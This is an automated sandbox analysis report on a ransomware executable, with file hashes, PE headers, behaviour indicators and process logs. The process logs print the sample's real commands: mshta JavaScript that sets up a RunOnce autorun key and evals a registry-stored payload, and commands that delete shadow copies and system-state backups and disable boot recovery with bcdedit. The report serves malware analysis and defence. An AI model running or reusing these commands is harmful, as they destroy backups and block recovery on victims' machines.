analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2.exe

Full analysis: https://app.any.run/tasks/0710d50c-5575-4f7d-bc41-6908ce297c5c
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Analysis date: April 23, 2019, 18:18:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ransomware
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

545C7D2D0C5B7686DD4A2012399148A9

SHA1:

A481C02F8CB988279431AAE959B2CBC2638443CB

SHA256:

3E4F8A1598F9DD834766D5184C3347947A201FF9A559FA275F048B14267D7F8A

SSDEEP:

12288:S9CZOU8dEgeDiSrnR32F8RB1laLv6GcxJ5Wj/o9ZPlThRqdbMSz+NHH+gD1axZF8:jZOU8dEgeDDrnR3losxyU9ZNThSwNHHr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Deletes shadow copies

      • cmd.exe (PID: 3572)
      • cmd.exe (PID: 560)
    • Starts BCDEDIT.EXE to disable recovery

      • cmd.exe (PID: 2724)
    • Changes the autorun value in the registry

      • osk.exe (PID: 3536)
      • mshta.exe (PID: 3372)
    • Dropped file may contain instructions of ransomware

      • osk.exe (PID: 3536)
  • SUSPICIOUS

    • Creates files in the user directory

      • cmd.exe (PID: 2384)
      • cmd.exe (PID: 1860)
    • Starts CMD.EXE for commands execution

      • 2.exe (PID: 1020)
      • 2.exe (PID: 1448)
      • mshta.exe (PID: 856)
      • osk.exe (PID: 3536)
    • Starts itself from another location

      • 2.exe (PID: 1448)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 1860)
      • cmd.exe (PID: 2384)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • 2.exe (PID: 1448)
      • osk.exe (PID: 3536)
    • Application launched itself

      • 2.exe (PID: 1020)
    • Creates files like Ransomware instruction

      • osk.exe (PID: 3536)
    • Creates files in the program directory

      • osk.exe (PID: 3536)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 2540)
      • mshta.exe (PID: 856)
      • mshta.exe (PID: 3372)
      • mshta.exe (PID: 2624)
    • Dropped object may contain Bitcoin addresses

      • osk.exe (PID: 3536)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

ProductVersion: 6.3.20.6
ProductName: Oemactivity
Languages: English
PrivateBuild: 6.3.20.6
FileVersion: 6.3.20.6
LegalCopyright: ©. All rights reserved. CJ Games
InternalName: Oemactivity
Comments: Reset Handler Affordances
FileDescription: Reset Handler Affordances
CompanyName: CJ Games
CharacterSet: Unicode
LanguageCode: English (U.S.)
FileSubtype: -
ObjectFileType: Executable application
FileOS: Windows NT 32-bit
FileFlags: (none)
FileFlagsMask: 0x003f
ProductVersionNumber: 6.3.20.6
FileVersionNumber: 6.3.20.6
Subsystem: Windows GUI
SubsystemVersion: 6
ImageVersion: -
OSVersion: 6
EntryPoint: 0x31a9e
UninitializedDataSize: -
InitializedDataSize: 435712
CodeSize: 327168
LinkerVersion: 14.2
PEType: PE32
TimeStamp: 2019:04:11 23:36:07+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 11-Apr-2019 21:36:07
Detected languages:
  • English - United States
CompanyName: CJ Games
FileDescription: Reset Handler Affordances
Comments: Reset Handler Affordances
InternalName: Oemactivity
LegalCopyright: ©. All rights reserved. CJ Games
FileVersion: 6.3.20.6
PrivateBuild: 6.3.20.6
Languages: English
ProductName: Oemactivity
ProductVersion: 6.3.20.6

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000108

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 6
Time date stamp: 11-Apr-2019 21:36:07
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x0009B000
0x00008175
0x00008200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.9776
.rdata
0x00051000
0x0001C61C
0x0001C800
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
6.23904
.data
0x0006E000
0x0002CBEC
0x0002B200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.96204
.rsrc
0x000A4000
0x00017690
0x00017800
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.67669
.reloc
0x000BC000
0x0000302C
0x00003200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
6.5476

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.96714
584
Latin 1 / Western European
English - United States
RT_MANIFEST
2
3.49429
1128
Latin 1 / Western European
English - United States
RT_ICON
3
2.53019
9640
Latin 1 / Western European
English - United States
RT_ICON
4
2.94198
4264
Latin 1 / Western European
English - United States
RT_ICON
5
2.34296
10344
Latin 1 / Western European
English - United States
RT_ICON
6
2.9922
2664
Latin 1 / Western European
English - United States
RT_ICON
101
2.84787
90
Latin 1 / Western European
English - United States
RT_GROUP_ICON
1198
2.14286
1064
Latin 1 / Western European
English - United States
RT_BITMAP
1389
3.14059
608
Latin 1 / Western European
English - United States
RT_STRING
3011
1.07875
44
Latin 1 / Western European
English - United States
RT_STRING

Imports

ADVAPI32.dll
COMCTL32.dll
GDI32.dll
KERNEL32.dll
MSIMG32.dll
MSVFW32.dll
NTDSAPI.dll
OLEAUT32.dll
RPCRT4.dll
SETUPAPI.dll
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
73
Monitored processes
25
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 2.exe no specs cmd.exe 2.exe taskmgr.exe no specs cmd.exe osk.exe mshta.exe no specs mshta.exe mshta.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wbadmin.exe no specs wmic.exe no specs vssadmin.exe no specs bcdedit.exe no specs bcdedit.exe no specs vssvc.exe no specs cmd.exe no specs net.exe no specs cmd.exe no specs mshta.exe no specs notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1020"C:\Users\admin\AppData\Local\Temp\2.exe" C:\Users\admin\AppData\Local\Temp\2.exeexplorer.exe
User:
admin
Company:
CJ Games
Integrity Level:
MEDIUM
Description:
Reset Handler Affordances
Exit code:
0
Version:
6.3.20.6
2384"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\admin\AppData\Local\Temp\2.exe" "C:\Users\admin\AppData\Roaming\osk.exe"C:\Windows\system32\cmd.exe
2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1448"C:\Users\admin\AppData\Local\Temp\2.exe" runasC:\Users\admin\AppData\Local\Temp\2.exe
2.exe
User:
admin
Company:
CJ Games
Integrity Level:
HIGH
Description:
Reset Handler Affordances
Exit code:
0
Version:
6.3.20.6
1740"C:\Windows\system32\taskmgr.exe" /4C:\Windows\system32\taskmgr.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Task Manager
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1860"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\admin\AppData\Local\Temp\2.exe" "C:\Users\admin\AppData\Roaming\osk.exe"C:\Windows\system32\cmd.exe
2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3536"C:\Users\admin\AppData\Roaming\osk.exe" C:\Users\admin\AppData\Roaming\osk.exe
2.exe
User:
admin
Company:
CJ Games
Integrity Level:
HIGH
Description:
Reset Handler Affordances
Exit code:
0
Version:
6.3.20.6
2540mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('2.exe');close()}catch(e){}},10);"C:\Windows\system32\mshta.exe2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3372mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\shwlwook',i);}catch(e){}},10);"C:\Windows\system32\mshta.exe
osk.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
856mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\BZHWY\\CQ[[S'));close();"C:\Windows\system32\mshta.exeosk.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3276"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
4294967293
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
11 466
Read events
1 017
Write events
10 446
Delete events
3

Modification events

(PID) Process:(1020) 2.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(1020) 2.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(1448) 2.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(1448) 2.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2540) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2540) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3536) osk.exeKey:HKEY_CURRENT_USER\Software\BZHWY
Operation:writeName:CQ[[S
Value:
o=new ActiveXObject("WScript.Shell");o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);
(PID) Process:(856) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(856) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3372) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
6 673
Text files
1 436
Unknown types
289

Dropped files

PID
Process
Filename
Type
3536osk.exeC:\Program Files\Adobe\Acrobat Reader DC\я
MD5:
SHA256:
3536osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Benioku.htm
MD5:
SHA256:
3536osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Berime.htm
MD5:
SHA256:
3536osk.exeC:\Program Files\Adobe\Acrobat Reader DC\IrakHau.htm
MD5:
SHA256:
3536osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Leame.htm
MD5:
SHA256:
3536osk.exeC:\Program Files\Adobe\Acrobat Reader DC\LeesMij.htm
MD5:
SHA256:
3536osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Leggimi.htm
MD5:
SHA256:
3536osk.exeC:\Program Files\Adobe\Acrobat Reader DC\LeiaMe.htm
MD5:
SHA256:
3536osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Liesmich.htm
MD5:
SHA256:
3536osk.exeC:\Program Files\Adobe\Acrobat Reader DC\Lisezmoi.htm
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info